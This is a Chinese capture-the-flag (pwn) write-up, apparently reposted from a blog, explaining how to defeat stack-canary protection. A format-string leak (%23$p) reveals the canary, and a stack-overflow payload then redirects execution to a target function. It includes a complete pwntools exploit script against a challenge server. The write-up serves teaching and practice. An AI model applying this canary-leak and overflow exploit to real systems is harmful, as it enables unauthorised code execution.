标签：格式化 p64 16 -- canary Canary pwn 0x88

ctf(pwn) canary保护机制讲解 与 破解方法介绍

程序执行流程

有三个选项,1是利用栈溢出,2是利用格式化字符串,3是退出;可连续输入多次;

IDA分析

解题思路

程序存在canary保护,利用格式化字符串漏洞 得到canary的位置, 在利用栈溢出覆盖它,返回地址改为目标函数 4008da

EXP

from pwn import *
r=remote('111.200.241.244',58448)
r.sendlineafter("3. Exit the battle ",'2')     #先进入格式化字符串利用
r.sendline("%23$p")
r.recvuntil("0x")
canary=int(r.recv(16),16)      #长度16位      取16进制
r.sendlineafter("3. Exit the battle ",'1')     #再进入栈溢出利用
payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da)
r.send(payload)
r.interactive()

EXP解读

1. r.sendline("%23$p")
   0x90-8h=0x88
   

0x88/0x8=0x11(十进制17)
这里除以8是因为(我翻了一下汇编语言这一本书):

8bit组成1个Byte,也就是一个字节

微型机存储器的存储单元可以存储一个字节,即8个二进制位

一个存储器有128个存储单元,它可存储128个字节

往后找17+6=23个地址上即存canary的值

这里加6是 print输入的偏移量
可以看看 CTF(pwn)-格式化字符串漏洞讲解(二) --攻防世界CGfsb

2.payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da)

有问题的评论区留言吧,我会回的❄

标签：格式化,p64,16,--,canary,Canary,pwn,0x88
来源： https://blog.csdn.net/weixin_45556441/article/details/114339627

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。